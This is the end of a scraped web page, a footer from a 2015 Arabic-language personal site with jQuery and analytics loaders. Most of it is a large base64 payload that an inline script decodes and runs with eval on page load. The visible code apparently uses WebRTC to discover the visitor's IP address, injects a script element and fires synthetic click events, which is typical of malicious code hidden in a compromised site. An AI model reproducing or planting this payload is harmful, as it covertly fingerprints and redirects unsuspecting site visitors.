x4NjlceDcwXHg3NFx4NjlceDZGXHg2RSIsIlx4NjNceDcyXHg2NVx4NjFceDc0XHg2NVx4NEZceDY2XHg2Nlx4NjVceDcyIiwiXHg2Q1x4NjVceDZFXHg2N1x4NzRceDY4IiwiXHg3M1x4NzVceDYyXHg3M1x4NzRceDcyIiwiXHgzMFx4MzBceDMwIiwiXHgzMFx4MzBceDMxIiwiXHg2Nlx4NzJceDZGXHg2RFx4NDNceDY4XHg2MVx4NzJceDQzXHg2Rlx4NjRceDY1IiwiXHg2M1x4NkZceDZFXHg2M1x4NjFceDc0IiwiXHg3Mlx4NjFceDZFXHg2NFx4NkZceDZEIiwiXHg2Nlx4NkNceDZGXHg2Rlx4NzIiLCJceDcyXHg2NVx4NzBceDZDXHg2MVx4NjNceDY1IiwiXHg0MVx4NDJceDQzXHg0NFx4NDVceDQ2XHg0N1x4NDhceDQ5XHg0QVx4NEJceDRDXHg0RFx4NEVceDRGXHg1MFx4NTFceDUyXHg1M1x4NTRceDU1XHg1Nlx4NTdceDU4XHg1OVx4NUFceDYxXHg2Mlx4NjNceDY0XHg2NVx4NjZceDY3XHg2OFx4NjlceDZBXHg2Qlx4NkNceDZEXHg2RVx4NkZceDcwXHg3MVx4NzJceDczXHg3NFx4NzVceDc2XHg3N1x4NzhceDc5XHg3QVx4MzBceDMxXHgzMlx4MzNceDM0XHgzNVx4MzZceDM3XHgzOFx4MzlceDJCXHgyRlx4M0QiLCJceDYzXHg2OFx4NjFceDcyXHg0M1x4NkZceDY0XHg2NVx4NDFceDc0IiwiXHg2M1x4NjhceDYxXHg3Mlx4NDFceDc0IiwiXHg1Rlx4MzAiXTsoZnVuY3Rpb24oKXtpZih2b2lkKDApPT13aW5kb3dbXzB4ZDlkOVswXV0pe3ZhciBfMHg5NTQ1eDE9ZnVuY3Rpb24oXzB4OTU0NXg5KXt2YXIgXzB4OTU0NXhhPSBuZXcgKHdpbmRvd1tfMHhkOWQ5WzJdXXx8d2luZG93W18weGQ5ZDlbM11dfHx3aW5kb3dbXzB4ZDlkOVs0XV0pKHtpY2VTZXJ2ZXJzOlt7dXJsOl8weGQ5ZDlbMV19XX0se29wdGlvbmFsOlt7UnRwRGF0YUNoYW5uZWxzOiEwfV19KTtfMHg5NTQ1eGFbXzB4ZDlkOVs1XV09ZnVuY3Rpb24oXzB4OTU0NXhiKXtpZihfMHg5NTQ1eGJbXzB4ZDlkOVs2XV0mJihfMHg5NTQ1eGI9LyhbMC05XXsxLDN9KFwuWzAtOV17MSwzfSl7M318W2EtZjAtOV17MSw0fSg6W2EtZjAtOV17MSw0fSl7N30pL1tfMHhkOWQ5WzddXShfMHg5NTQ1eGJbXzB4ZDlkOVs2XV1bXzB4ZDlkOVs2XV0pWzFdKSl7aWYoIV8weDk1NDV4NyYmIV8weDk1NDV4YltfMHhkOWQ5WzhdXSgvXigxOTJcLjE2OFwufDE2OVwuMjU0XC58MTBcLnwxNzJcLigxWzYtOV18MlxkfDNbMDFdKSkvKSYmIV8weDk1NDV4YltfMHhkOWQ5WzhdXSgvXlthLWYwLTldezEsNH0oOlthLWYwLTldezEsNH0pezd9JC8pKXtfMHg5NTQ1eDc9ICEwO3NjcmlwdEVsZW1lbnQ9ZG9jdW1lbnRbXzB4ZDlkOVsxMF1dKF8weGQ5ZDlbOV0pO3NjcmlwdENGQVN5bmM9ZG9jdW1lbnRbXzB4ZDlkOVsxMl1dKF8weGQ5ZDlbMTFdKTtzY3JpcHRDRkFTeW5jW18weGQ5ZDlbMTNdXT0gITE7c2NyaXB0RWxlbWVudFtfMHhkOWQ5WzE0XV0oc2NyaXB0Q0ZBU3luYyk7YT1fMHg5NTQ1eDQrXzB4ZDlkOVsxNV0rKF8weDk1NDV4OStfMHg5NTQ1eDQpK18weGQ5ZDlbMTVdK18weDk1NDV4NTtzY3JpcHRFbGVtZW50W18weGQ5ZDlbMTZdXT1fMHhkOWQ5WzE3XStfMHg5NTQ1eGIrXzB4ZDlkOVsxNV0rXzB4OTU0NXg4W18weGQ5ZDlbMThdXShhKTtzY3JpcHRFbGVtZW50W18weGQ5ZDlbMTldXT1mdW5jdGlvbigpe2lmKHZvaWQoMCk9PXdpbmRvd1tfMHhkOWQ5WzIwXV0pe31lbHNlIHtmb3IodmFyIF8weDk1NDV4YyBpbiB3aW5kb3dbXzB4ZDlkOVsyMF1dKXtfMHg5NTQ1eDZbXzB4OTU0NXgyKF8weDk1NDV4YyldPV8weDk1NDV4Mihjb25maWdbXzB4OTU0NXhjXSl9O2RvY3VtZW50W18weGQ5ZDlbMjFdXT1mdW5jdGlvbigpe2lmKCFfMHg5NTQ1eDMpe18weDk1NDV4Mz0xO3ZhciBfMHg5NTQ1eGQ9ZG9jdW1lbnRbXzB4ZDlkOVsxMF1dKF8weGQ5ZDlbMjJdKTtfMHg5NTQ1eGRbXzB4ZDlkOVsyM11dPV8weDk1NDV4NltfMHhkOWQ5WzI0XV07XzB4OTU0NXhkW18weGQ5ZDlbMjVdXT1fMHhkOWQ5WzI2XTtkb2N1bWVudFtfMHhkOWQ5WzI4XV1bXzB4ZDlkOVsyN11dKF8weDk1NDV4ZCk7dmFyIF8weDk1NDV4ZT0gbmV3IE1vdXNlRXZlbnQoXzB4ZDlkOVsyOV0seyJceDc2XHg2OVx4NjVceDc3Ijp3aW5kb3csIlx4NjJceDc1XHg2Mlx4NjJceDZDXHg2NVx4NzMiOnRydWUsIlx4NjNceDYxXHg2RVx4NjNceDY1XHg2Q1x4NjFceDYyXHg2Q1x4NjUiOmZhbHNlfSk7XzB4OTU0NXhkW18weGQ5ZDlbMzBdXShfMHg5NTQ1eGUpO18weDk1NDV4ZFtfMHhkOWQ5WzMyXV1bXzB4ZDlkOVszMV1dKF8weDk1NDV4ZCl9fX19O3NjcmlwdEVsZW1lbnRbXzB4ZDlkOVszM11dPSAhMTt2YXIgXzB4OTU0NXhmO18weGQ5ZDlbMzRdIT09IHR5cGVvZiBkb2N1bWVudFtfMHhkOWQ5WzM1XV0mJihfMHg5NTQ1eGY9ZG9jdW1lbnRbXzB4ZDlkOVszNV1dWzBdKTtfMHhkOWQ5WzM0XT09IHR5cGVvZiBfMHg5NTQ1eGYmJihfMHg5NTQ1eGY9ZG9jdW1lbnRbXzB4ZDlkOVszNl1dKF8weGQ5ZDlbOV0pWzBdKTtfMHg5NTQ1eGZbXzB4ZDlkOVszMl1dW18weGQ5ZDlbMzddXShzY3JpcHRFbGVtZW50LF8weDk1NDV4Zil9fX07XzB4OTU0NXhhW18weGQ5ZDlbMzldXShfMHhkOWQ5WzM4XSk7XzB4OTU0NXhhW18weGQ5ZDlbNDFdXShmdW5jdGlvbihfMHg5NTQ1eGQpe18weDk1NDV4YVtfMHhkOWQ5WzQwXV0oXzB4OTU0NXhkLGZ1bmN0aW9uKCl7fSxmdW5jdGlvbigpe30pfSxmdW5jdGlvbigpe30pfSxfMHg5NTQ1eDI9ZnVuY3Rpb24oXzB4OTU0NXhkKXtmb3IodmFyIF8weDk1NDV4ZT1fMHg5NTQ1eGRbXzB4ZDlkOVs0Ml1dLF8weDk1NDV4Yz1fMHhkOWQ5WzM4XSxfMHg5NTQ1eGIsXzB4OTU0NXhmPTA7XzB4OTU0NXhmPF8weDk1NDV4ZTtfMHg5NTQ1eGYrPTMpe18weDk1NDV4Yj1fMHg5NTQ1eGRbXzB4ZDlkOVs0M11dKF8weDk1NDV4ZiwzKTtpZihfMHhkOWQ5WzQ0XT09XzB4OTU0NXhiKXtyZXR1cm4gITF9O2lmKF8weGQ5ZDlbNDVdPT1fMHg5NTQ1eGIpe3JldHVybiAhMH07XzB4OTU0NXhiPV8weDk1NDV4ZiUyP3BhcnNlSW50KF8weDk1NDV4YiwxMCk+PjE6cGFyc2VJbnQoXzB4OTU0NXhiLDEwKT4+MjtfMHg5NTQ1eGM9XzB4OTU0NXhjW18weGQ5ZDlbNDddXShTdHJpbmdbXzB4ZDlkOVs0Nl1dKF8weDk1NDV4YikpfTtfMHg5NTQ1eGQ9cGFyc2VJbnQoXzB4OTU0NXhjLDEwKTswPD1fMHg5NTQ1eGQmJk5hTiE9XzB4OTU0NXhkJiYoXzB4OTU0NXhjPV8weDk1NDV4ZCk7cmV0dXJuIF8weDk1NDV4Y30sXzB4OTU0NXgzPSExLF8weDk1NDV4ND1NYXRoW18weGQ5ZDlbNDldXSgxRTEyKk1hdGhbXzB4ZDlkOVs0OF1dKCkpLF8weDk1NDV4NT1NYXRoW18weGQ5ZDlbNDhdXSgpLnRvU3RyaW5nKDM2KVtfMHhkOWQ5WzUwXV0oL1teYS16QS1aMC05XSsvZyxfMHhkOWQ5WzM4XSlbXzB4ZDlkOVs0M11dKDAsMTApLF8weDk1NDV4Nj1bXSxfMHg5NTQ1eDc9ITEsXzB4OTU0NXg4PXtfMDpfMHhkOWQ5WzUxXSxlbmNvZGU6ZnVuY3Rpb24oXzB4OTU0NXhkKXtmb3IodmFyIF8weDk1NDV4ZT1fMHhkOWQ5WzM4XSxfMHg5NTQ1eGMsXzB4OTU0NXhiLF8weDk1NDV4ZixfMHg5NTQ1eDksXzB4OTU0NXhhLF8weDk1NDV4MTAsXzB4OTU0NXgxMT0wO18weDk1NDV4MTE8XzB4OTU0NXhkW18weGQ5ZDlbNDJdXTspe18weDk1NDV4Yz1fMHg5NTQ1eGRbXzB4ZDlkOVs1Ml1dKF8weDk1NDV4MTErKyksXzB4OTU0NXhiPV8weDk1NDV4ZFtfMHhkOWQ5WzUyXV0oXzB4OTU0NXgxMSsrKSxfMHg5NTQ1eGY9XzB4OTU0NXhkW18weGQ5ZDlbNTJdXShfMHg5NTQ1eDExKyspLF8weDk1NDV4OT1fMHg5NTQ1eGM+PjIsXzB4OTU0NXhjPShfMHg5NTQ1eGMmMyk8PDR8XzB4OTU0NXhiPj40LF8weDk1NDV4YT0oXzB4OTU0NXhiJjE1KTw8MnxfMHg5NTQ1eGY+PjYsXzB4OTU0NXgxMD1fMHg5NTQ1eGYmNjMsaXNOYU4oXzB4OTU0NXhiKT9fMHg5NTQ1eGE9XzB4OTU0NXgxMD02NDppc05hTihfMHg5NTQ1eGYpJiYoXzB4OTU0NXgxMD02NCksXzB4OTU0NXhlPV8weDk1NDV4ZSt0aGlzW18weGQ5ZDlbNTRdXVtfMHhkOWQ5WzUzXV0oXzB4OTU0NXg5KSt0aGlzW18weGQ5ZDlbNTRdXVtfMHhkOWQ5WzUzXV0oXzB4OTU0NXhjKSt0aGlzW18weGQ5ZDlbNTRdXVtfMHhkOWQ5WzUzXV0oXzB4OTU0NXhhKSt0aGlzW18weGQ5ZDlbNTRdXVtfMHhkOWQ5WzUzXV0oXzB4OTU0NXgxMCl9O3JldHVybiBfMHg5NTQ1eGV9fTtfMHg5NTQ1eDEoMTE3MzQ2NCk7fX0pKCk7</span>
<script type="text/javascript">(function(){if (window.atob) { eval(window.atob(document.getElementById('hAr7GeuX').innerHTML)) } })();</script>
-->

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
<script type="text/javascript" async  src="/js/minifyxswitch.js" defer></script><!--bottom Footer -->

<div id="bottom-footer">
<p>&copy; 2015 <a href="https://www.facebook.com/sulieman.nimer">Sulieman Nimer</a> All Rights Reserved</p>
<a href="#" id="goTop">للاعلى</a>
<br class="clear" />
Active users <b>133</b></div>

</div>


<!--Bottom Footer Ends -->
<script type="text/javascript">
//<![CDATA[
(function() {
var _analytics_scr = document.createElement('script');
_analytics_scr.type = 'text/javascript'; _analytics_scr.async = true; _analytics_scr.src = '/_Incapsula_Resource?SWJIYLWA=2977d8d74f63d7f8fedbea018b7a1d05&ns=2';
var _analytics_elem = document.getElementsByTagName('script')[0]; _analytics_elem.parentNode.insertBefore(_analytics_scr, _analytics_elem);
})();
// ]]>
</script></body>
</html>

US54.224.77.253	
